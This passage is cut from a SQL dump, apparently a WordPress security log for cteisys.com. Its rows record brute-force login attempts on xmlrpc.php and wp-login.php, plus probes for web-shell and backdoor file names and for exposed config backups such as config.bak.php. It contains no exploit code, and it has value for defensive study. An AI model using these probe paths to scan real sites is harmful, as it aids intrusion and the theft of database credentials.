|0|cteisys.com/xmlrpc.php',0,0,0),('82.166.39.15',1386620687,'newd',0,1665376575.3318,7,'R1Itcw4g72VZbr0f9MFyGvkQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('3.12.55.205',51132365,'newd',0,1665376463.8603,152,'F1pn6fyh7ixeRSOt3NPo8jJ4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.78.164',2808303268,'newd',0,1665376170.6756,152,'gldJK5o4NGWczBPRbMv6eYqr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.230.202.147',1877396115,'newd',0,1665376148.0203,7,'nDmVSXJE2l7TjeQ5CqxwdLbH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.107.33.26',795549978,'newd',0,1665375906.2846,152,'mQuC2sLqKlcDe7XObGvt0E4x','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.39.212.31',1294455839,'newd',0,1665375568.9760,7,'FTLMZSIKXoHg2esERfknNwJ7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('66.94.117.33',1113486625,'newd',0,1665375320.0779,152,'I6HcPrj34UJTlgSBbhqZLtpm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.236.152.148',2917963924,'newd',0,1665375135.1067,7,'8LTHRNBhpkbFrut4gQq9a1MU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.159.15.23',866062103,'newd',0,1665375032.7961,152,'qtzsH0vUAfXx7eS3YCZ9TMNk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.244.162.250',2415174394,'newd',0,1665374740.6958,152,'TFBZOxGqhgkRl8cer10Pn7oY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.46.85.155',3324925339,'newd',0,1665374548.1898,7,'uBzJCIb96ksScl2x7OUfpF5K','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.165.198.224',3164980960,'newd',0,1665381517.8857,7,'pb3neO5VwT9GrcAP2ChR08uj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('35.219.66.183',601572023,'newd',0,1665381478.0317,152,'DkemCUWxJiL7nqT538lIaQFp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('108.179.193.190',1823719870,'newd',0,1665381251.9962,152,'Dw49LOKphNyJ2ofd3UiCQP1c','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.62.27',1137524251,'newd',0,1665381103.6888,7,'zH2YB0GIQTDfXrpg6SPv1M8x','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('195.93.152.83',3277690963,'newd',0,1665380996.5399,152,'5RXUG9qu6LOFnxibfkwpIW4K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('75.119.157.181',1266130357,'newd',0,1665380547.7837,7,'Tgy2OsHURB7j4WVa58hZAqoK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('90.156.169.12',1520216332,'newd',0,1665380187.5910,152,'iR2xFLdhSsf4tQo6kjUCaNl0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.69.8.8',2672101384,'newd',0,1665380136.7354,7,'SJILDEto65nA0wQNMqzGHKYi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('66.94.117.33',1113486625,'newd',0,1665379948.1191,152,'th9fiP71vN8lVcZdkTnmRFWI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.79.8.125',2018445437,'newd',0,1665379694.9777,152,'MRbnW47YKkCD19JZqadPcVvF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.62.27',1137524251,'newd',0,1665379549.8126,7,'mJxUSlAFEuQYcP0H6ZI5vzg3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.68.97.70',574906694,'newd',0,1665379465.7629,152,'muoRbSXBpiVYA4nCztx2rq1I','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.68.228.235',860153067,'newd',0,1665379229.9722,152,'Djkg5OVYToPn4zIxBc6tWMQy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.120.69.121',762856825,'newd',0,1665379139.7654,7,'0QOrLR2jcIHqeDl5mwKaWUAp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.12.254.32',3322740256,'newd',0,1665378739.2540,152,'ovLyZSWnfH0MBaeG9PYRi2F5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.111.127.191',1081049023,'newd',0,1665378553.6458,7,'GMulwTYhVX1nkdeL2NE0zqmS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.80.24.73',2538608713,'newd',0,1665378485.4024,152,'o0C5kLOzFyXRiHgr8PZsYtDb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.74.118.242',1732933362,'newd',0,1665378225.5435,152,'ZFCo7PJiRlef4camUHgNzpL2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.21.87.243',3642054643,'newd',0,1665378151.2771,7,'VRyz6OJo0P8l1Cj9kWdrvLFK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('95.217.129.44',1608089900,'newd',0,1665385161.2682,7,'VoYpbU1BgCxSjKPZD7utAIkf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('72.167.225.151',1218961815,'newd',0,1665384968.7257,152,'u9kGMsIRd2NbKTWvfUrAELwS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('41.93.82.7',693981703,'newd',0,1665384632.8284,152,'LrwJEkCVFj82hycu3ItdRXOH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.240.13.186',1307577786,'newd',0,1665384598.7844,7,'kwIqvmbEu7xairts9UlPAD0y','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.165.184.76',1386592332,'newd',0,1665384376.3090,152,'7Gm32o5YjHJvlaideLXNsUZz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('69.163.224.107',1168367723,'newd',0,1665384142.4849,7,'infYpqCvEzUKc0PMyheQT59j','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('109.233.192.83',1844035667,'newd',0,1665384066.1126,152,'auKPO2Zz58b9tUgx4p6rqGi0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('149.248.59.66',2516073282,'newd',0,1665383572.2152,7,'89Hqsa4AYJuxMCvPIboLRhmZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.178.73',2160570953,'newd',0,1665383467.6928,152,'EWj8bQCT2d3gBVzHicaqxmkt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('125.212.241.69',2111107397,'newd',0,1665383161.3779,152,'bl3MnhV1xNq6iGgjPHTkZ5f4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('36.94.142.166',610176678,'newd',0,1665383139.1957,7,'BvDYQXGfLP1OCorsnRKNUztS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('216.245.215.122',3639990138,'newd',0,1665382887.4322,152,'mYNhiU7eCqrEj8BWkfXoJ4Dp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.64.218.102',574675558,'newd',0,1665382601.1894,152,'CEn3WSTRrqOl2964hieHMyuB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.179.87.147',1739806611,'newd',0,1665382308.4553,152,'GZ5gni7RBUsKSYeQ3D2qahxm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.111.116.44',795833388,'newd',0,1665382115.0404,7,'kKbgZd3Eev4unRt1OUQc8iFS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.180.107.103',1806986087,'newd',0,1665381769.1002,152,'wTVpgdLZI1uBMnQyP4X3NCiU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.178.138.5',867338757,'newd',0,1665388729.5154,7,'H7grWiqD806pPS5XBv3nysbJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('109.234.161.93',1844093277,'newd',0,1665388499.7137,152,'6DE80CU2egptwLrzmHPTFhkQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.131.68.19',1753433107,'newd',0,1665388279.4857,7,'a3uX6BUbSt9W4qwydYvhIxAJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('72.34.62.119',1210203767,'newd',0,1665388144.0096,152,'jecVKRt05qWDyINLMoYhaPum','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.98.152.12',1734514700,'newd',0,1665387829.0036,152,'fNw23yiIZcUabC6Brz0oP7Ak','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.230.202.147',1877396115,'newd',0,1665387683.4844,7,'cqakUFR9QYtLXy8K4OEjgimH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('143.244.155.35',2415172387,'newd',0,1665387230.9692,7,'53OK2wnXZ6TSmJIN87ip1xqA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.172.56.36',2813081636,'newd',0,1665387180.1589,152,'PfpVTiGF9IxX4R5cjKleJMUW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.35.103.104',2703452008,'newd',0,1665386843.9446,152,'1f4g9D2brIuwVKSylMRt3siJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.68.76.32',574901280,'newd',0,1665386642.0829,7,'tpSRTXNeIx12mFzDgWhV0EH8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.79.144.41',860852265,'newd',0,1665386531.2461,152,'oHbzXi5YG0RPyCNWDL97tlZF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.25.21.16',2065241360,'newd',0,1665386197.3642,7,'QujMDezlqcraN51RXwBYnF0T','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('72.29.76.78',1209879630,'newd',0,1665385896.6040,152,'jCAqbxRDHwltv4ceLu8FohJ3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.91.237.106',1432087914,'newd',0,1665385614.4652,7,'kKtoLNhw0qZalFIArUOiWPpz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.42.98.32',3257557536,'newd',0,1665385275.9882,152,'edxg1jnfw6BMSzFslO7a94rb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.234.161.93',1844093277,'newd',0,1665392363.5985,152,'kUmVd2ycGrWoLTQCJwFKvfqI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.8.58.8',1997027848,'newd',0,1665391955.5211,152,'mCIS6TLsFxYVhfOdE7Rv2BX1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('121.40.238.50',2032725554,'newd',0,1665391611.8573,152,'gIkOijszeyRfZBlq7GXa9AMb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.183.122.143',3115809423,'newd',0,1665391274.4427,152,'g23PWbky0Hmc4OJpQVFhLrdI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.219.142',2671893390,'newd',0,1665390564.7054,152,'JOTfpweBk1j5cxZCED9K3a4s','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.244.177.220',2415178204,'newd',0,1665390376.0521,7,'LOuKAh7NRw4zlr6iPsbVS38v','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.152.164.103',1738056807,'newd',0,1665390204.5303,152,'lkH7UejG5yhZYvfnx1KC0sLI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.99.34.140',3227722380,'newd',0,1665389862.0218,152,'1rlQSx0PDInGJae6m87qipCf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.75.82',1152863058,'newd',0,1665389773.0865,7,'6uKbVfDclnYTC9g3dWMqwEmO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.12.250.252',3322739452,'newd',0,1665389524.3871,152,'jsArnDSVdYLma4TeZqC3xipK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('166.62.125.246',2789113334,'newd',0,1665389330.7897,7,'l34kaM6TZv7n8XYfmyENW0rJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('111.90.145.188',1868206524,'newd',0,1665388818.3886,152,'lib9wnHYd1UDavsCjApRZEQz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.79.144.41',860852265,'wadminw',0,1665417682.7665,152,'jrU29a0Jyebg3RHAfElQNTIi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.156.175.43',3114053419,'Joyce',0,1665417056.6768,152,'sQWN0jOXABocVGUMIFbSzah9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.57.222.214',1731845846,'',0,1665416908.6985,55,'AfB9vnqtWYeo57MjakDi0l4y','','19|0|0|0|cteisys.com/wp-static.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416907.5452,55,'TJkt0I2CYmWP1jfG7cLZd9OS','','19|0|0|0|cteisys.com/wp-content/uploads/wp-queryall.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416906.4350,55,'loRdeQtChxFIvM7V851bLJO0','','19|0|0|0|cteisys.com/wp-queryall.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416905.2434,55,'oZxUiPma8gebh5EBvTQ2sHn1','','19|0|0|0|cteisys.com/wp-content/themes/classic/inc/index.php',0,19,0),('178.128.209.28',2994786588,'newd',0,1665395706.4950,152,'ebGV1ho908PKuAFyHtNJQaBU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('83.143.116.3',1401910275,'newd',0,1665395344.8522,152,'s8WXZJhyM6YHlq0p75O3BRGE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.42.98.32',3257557536,'newd',0,1665394970.6958,152,'4UmWE7XqgwQd6sBGtNnyFoO5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.176.230.188',3249596092,'newd',0,1665394215.9273,152,'ij8rNmFL4X0gUYPvxTAOHR1G','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.24.52.65',2014852161,'newd',0,1665393828.8656,152,'x9HAQGiS6Lbc3ZkY5z7mBOyP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('196.44.176.39',3291263015,'newd',0,1665393482.2649,152,'fpsnKi3tmoNYZkqyJ4AUvPb0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.90.101.113',1046111601,'newd',0,1665393076.1476,152,'IB5l3WwOHzRnFqeQjAhS8gmu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.57.222.214',1731845846,'',0,1665416903.9637,55,'u8FBRVpxYIWHo65flrAgh29E','','19|0|0|0|cteisys.com/wp-content/themes/twentythree/inc/index.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416902.4559,55,'3QGRPDsZNk2Fy9CHlSziBgYT','','19|0|0|0|cteisys.com/wp-content/plugins/networker/networker.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416899.7801,55,'X6RLJxVtThjHeU7Pao9SF3AD','','19|0|0|0|cteisys.com/wp-content/plugins/wp-light/wp-light.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416889.1810,55,'F2o4VRxqikMYQPleEbtjz6Nu','','19|0|0|0|cteisys.com/wp-plain.php.suspected',0,19,0),('103.57.222.214',1731845846,'',0,1665416887.7798,55,'vAOJc07nV2mGtDBE9bfjUQZx','','19|0|0|0|cteisys.com/wp-plain.php',0,19,0),('184.168.125.241',3098050033,'newd',0,1665399583.2900,152,'H36VqnvMdpmETzCoO5bjx9GJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.219.251.247',1759247351,'newd',0,1665399219.1394,152,'coElXI1FDB6xMn7gT0AStiJj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.106.201.134',795527558,'newd',0,1665398808.8926,152,'ZHwAQIgo4qx9jeYMdOKmJTrX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.29.76.78',1209879630,'newd',0,1665398037.1961,152,'2Q9cJuSTdKFyELtHMeRYfiXz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.242.56.232',3270654184,'newd',0,1665397639.2990,152,'qMzwZh8c93TmHrXsIGUBxNDR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.104.66.61',795361853,'newd',0,1665397263.5291,152,'z8iKATrxDspcMVtyQ56IUbWf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.153.8.103',3113814119,'newd',0,1665396869.2734,152,'QZwSAvH0oUx5tEOnFg6qf8hr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.68.196.90',1950663770,'newd',0,1665396094.7929,152,'GlCW2nfMVRg6dFUxDamXKNSj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.76.135.15',2018281231,'newd',0,1665402786.5422,152,'jraiVoWv9hd4y1XT0zUeR6fq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.178.73',2160570953,'newd',0,1665402361.8420,152,'HQ3INaBuVmqv4zrO2wCi6ksX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.12.250.252',3322739452,'newd',0,1665401975.8262,152,'mQ8F03Tn42aVft59wShpsGYR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.245.215.122',3639990138,'newd',0,1665401563.7850,152,'8RmigCZI1YBszK4uxNDMl7Ja','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.90.235.70',1734011718,'newd',0,1665401156.2126,152,'cwzCg8GmivBdbKSfVu714Lre','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.197.5.130',600114562,'newd',0,1665401085.2653,152,'1FBTkpeyrXlKGHEQvaWId2CS','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('35.197.5.130',600114562,'newd',0,1665401084.2204,152,'S81ZPjVWa5cNmgGUd9xp0bTu','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('35.197.5.130',600114562,'newd',0,1665401083.1284,152,'SbneaLBGy6o1Ac5m9z3XJQfp','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('67.23.254.254',1125646078,'newd',0,1665400778.4469,152,'3zSv2849WVp1tGKPUF0RwBf7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.35.64.73',1730363465,'newd',0,1665399986.6866,152,'MiVdSF9hp1bcNuUjPKm6wLxg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.57.222.214',1731845846,'',0,1665416886.4836,55,'dFaljYrvfI9GRw7QkZsy3PgT','','19|0|0|0|cteisys.com/wp-system-opencloud.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416885.3933,55,'PKN3bROXEkTMdgB5DHA1eanL','','19|0|0|0|cteisys.com/wp-system-cloud.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416884.2810,55,'QDkrhwA8Rsiy5ImptjBVMOlN','','19|0|0|0|cteisys.com/wp-shield-icon-managed.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416882.9854,55,'zFGWEoRQKqSuO3JXfnai17AU','','19|0|0|0|cteisys.com/wp-includes/wp-system-opencloud.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416881.5476,55,'ukKgDqTsIGrJC8mE16v4BfwS','','19|0|0|0|cteisys.com/wp-includes/wp-system-cloud.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416880.1869,55,'9n6yLBSRlsugQp058q2GeCYJ','','19|0|0|0|cteisys.com/wp-includes/wp-shield-icon-managed.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416878.9354,55,'krIEoOCQf4bLUdtHRGBguexp','','19|0|0|0|cteisys.com/wp-includes/system-reboot.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416877.8303,55,'oF3E7QUJqp4jm2KsYDckXMl0','','19|0|0|0|cteisys.com/wp-includes/class-wordpress-license.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416876.7032,55,'LGiUk5SHsVvZCnjemENOYAaK','','19|0|0|0|cteisys.com/wp-includes/class-wordpress-cloud.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416875.4615,55,'2VYMedlot6DR4F5Wb1sBrhgm','','19|0|0|0|cteisys.com/wp-includes/class-detect-spam.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416874.1583,55,'kVFt7x5lQ4W9eLByJdYvCSg3','','19|0|0|0|cteisys.com/wp-files-conficg.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416872.8045,55,'1ACERo3l6Kv9bdNDWeFOq8tc','','19|0|0|0|cteisys.com/wp-content/wp-files-conficg.php',0,19,0),('35.211.94.153',601054873,'wwwadmin',0,1665413729.2489,152,'GKPpXtf1Fa47l29uxTM5DeOL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.90.101.113',1046111601,'wwwadmin',0,1665412809.7858,152,'sW8Ejz2xLXkQiqDMoG9w6Jv3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.188.207.230',3351039974,'wwwadmin',0,1665406754.6838,152,'cUi9g7LxHlBJmfku4ONaqTed','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.219.250.15',2732325391,'wadminw',0,1665406315.3692,152,'lQtINsS45ne7RHr3o9LJD6qb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.210.99.98',869426018,'wwwadmin',0,1665405915.6473,152,'B3eGNikwIotOSD57RvFQu9hM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.142.204',2808319692,'newd',0,1665405581.6251,152,'LMmZJ7lCwQYcOS6bDaUx38uk','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('167.99.142.204',2808319692,'newd',0,1665405578.9436,152,'e5zRNuxkmEjVLhIcqK3dOPrQ','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('167.99.142.204',2808319692,'newd',0,1665405577.5348,152,'M3LpaWovEc94wBUK7z6H5Ger','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('216.245.215.122',3639990138,'wadminw',0,1665405458.7706,152,'Z4VeBymqT8kSAFK0QdfLu6vM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.67.171',3270067115,'newd',0,1665405280.2852,152,'2AIBcVfhQmkg8x4sjKE0qz6y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.137.20.41',763958313,'',0,1665404950.6318,10,'Tnf1ludvxja5ELFyg8bBcer3','','707|0|0|0|cteisys.com/site/wp-content/themes/seotheme/mar.php',0,707,0),('45.137.20.41',763958313,'',0,1665404950.6287,55,'Tnf1ludvxja5ELFyg8bBcer3','','19|0|0|0|cteisys.com/site/wp-content/themes/seotheme/mar.php',0,19,0),('45.137.20.41',763958313,'',0,1665404947.2060,55,'R8dHijN094KChFcp7VSIPxEm','','19|0|0|0|cteisys.com/blog/wp-content/themes/seotheme/mar.php',0,19,0),('45.137.20.41',763958313,'',0,1665404944.3212,55,'B6LDUQNAH2i3gpdozStKnk8u','','19|0|0|0|cteisys.com/wordpress/wp-content/themes/seotheme/mar.php',0,19,0),('45.137.20.41',763958313,'',0,1665404941.7840,55,'J8dpWeaHz7wZYQo6lrTgGR0j','','19|0|0|0|cteisys.com/wp/wp-content/themes/seotheme/mar.php',0,19,0),('45.137.20.41',763958313,'',0,1665404939.0533,55,'giTqMDYKeESIoR2bZF17AmtU','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('51.210.251.22',869464854,'newd',0,1665404877.4271,152,'uNvX6DqAtZVFIgj7h9MBTyPw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.91.83.187',861623227,'newd',0,1665404446.8418,152,'CpzFIjrDtSHYuRlLJNV7x4qv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.12.250.252',3322739452,'newd',0,1665404024.5830,152,'Fp7Ivi06w9CdBPyZVokaYGtJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.209.28',2994786588,'newd',0,1665403589.8898,152,'TZbY6XtypqQ8gVxNucR3ozOj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.76.51.29',1347171101,'',0,1665412503.9171,55,'g2DltUsYX5I8OyFv6NRPLe39','','19|0|0|0|cteisys.com/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412497.3466,55,'gOCyDPVSQTxs6hA5inq7JtfH','','19|0|0|0|cteisys.com/wp-content/langar.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412494.4968,100,'3ibVhYCrT4vsPK7g2kLMnSeH','','13|0|0|0|cteisys.com/test.php',0,13,0),('80.76.51.29',1347171101,'',0,1665412491.6292,55,'Q0HlF1eSRiMKVaqIA6TsXPxn','','19|0|0|0|cteisys.com/config.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412490.6308,55,'bin01YxCrGV2sMeUkzhAu6EZ','','19|0|0|0|cteisys.com/upload.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412486.3066,55,'AIL3jURTmOw02X1nJ9ztDYq4','','19|0|0|0|cteisys.com/up.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412481.1099,55,'i9QM8xBr3yT67voKkzWfhdlG','','19|0|0|0|cteisys.com/wp-includes/small.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412471.7068,55,'ktEgT1vy0pmWu6fcJ9dbA7s8','','19|0|0|0|cteisys.com/wp-includes/lfx.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412469.0749,55,'KMX8rtR6sEmuhBOjNaikZgVz','','19|0|0|0|cteisys.com/wp-content/mu-plugins/db-safe-mode.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412465.2087,55,'XQwAlSWxDstjKZbaJC2keV3Y','','19|0|0|0|cteisys.com/legion.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412463.1042,100,'kyhZRP5WuEAavXCU3JFzL0V6','','13|0|0|0|cteisys.com/wp-content/wp-old-index.php',0,13,0),('80.76.51.29',1347171101,'',0,1665412457.1965,55,'jngdsMAGW2POXLYb0DIVCBwr','','19|0|0|0|cteisys.com/haders.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412445.6653,100,'3K0rNWoSML4gJkFP2OVRhCGf','','13|0|0|0|cteisys.com/wp-content/plugins/wpconfig.bak.php',0,13,0),('80.76.51.29',1347171101,'',0,1665412443.0287,100,'IqM1xboK6Rkyz7cmwfUjWunV','','13|0|0|0|cteisys.com/wp-includes/wpconfig.bak.php',0,13,0),('177.52.160.32',2973016096,'wwwadmin',0,1665410243.9248,152,'yjWdK1vlwc8kAMPSJn3tHRTe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('121.40.238.50',2032725554,'wwwadmin',0,1665409351.7439,152,'DOVyItwlm3EqNApzgR8Xc5Zv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.240.216.162',2733693090,'wadminw',0,1665408948.9177,152,'rjBhA4JeQkRP9sntqxi27IFO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.83.144.103',3109261415,'',0,1665408543.1176,55,'x2AK6bqQuLpNfVsjEoH9lXkt','','19|0|0|0|cteisys.com/phpinfo.php.bak',0,19,0),('185.83.144.103',3109261415,'',0,1665408542.8916,55,'JTSnjZ0LUlVhFp5QNxkobGiR','','19|0|0|0|cteisys.com/phpinfo.php.bak',0,19,0),('81.68.222.69',1363467845,'wwwadmin',0,1665408490.7533,152,'uS0pfxQoi1snEqI5tMhbmLgH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'wadminw',0,1665408064.1530,152,'Vg85p2A9FWG7zBZ0dMxLKyfX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.0.140.186',2634058938,'wadminw',0,1665407185.4647,152,'dOaMVLscw5oCISAebpDEl6XB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.76.51.29',1347171101,'',0,1665412440.5675,55,'Hf45aDNnqsIYFo30XrvR2lzL','','19|0|0|0|cteisys.com/wp-content/plugins/ubh/up.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412433.3813,18,'yYdAFzPInmoJMVQufUxqiTjk','','13|0|0|0|cteisys.com/wp-includes/css/wp-config.php',0,13,0),('80.76.51.29',1347171101,'',0,1665412426.5740,55,'ayLdDcXjT9OhW7qCgIJ4vYse','','19|0|0|0|cteisys.com/wp-content/plugins/config.bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412425.0751,55,'sWIdCylDthV4PKfYeRcqxJAQ','','19|0|0|0|cteisys.com/wp-content/themes/config.bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412420.7709,55,'6ZvV5FMpj7mNXPWdsJIYEQhB','','19|0|0|0|cteisys.com/wp-includes/config.bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412416.7142,55,'0A3N7kbmvsMaGT95qxg8KteP','','19|0|0|0|cteisys.com/wp-content/config.bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412415.2205,55,'sXuSGJlxYZ0Ubd4T93pWaOhf','','19|0|0|0|cteisys.com/wp-admin/config.bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412412.0537,55,'x0nR7CmPDVZA8QIXSaB2t4go','','19|0|0|0|cteisys.com/config.bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412409.8988,55,'jLcKGphmukH4OeXCUyAaJMw8','','19|0|0|0|cteisys.com/old-index.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412405.2616,55,'OAHL25b7rQm1wFS0Es4lZDBY','','19|0|0|0|cteisys.com/wp-includes/cs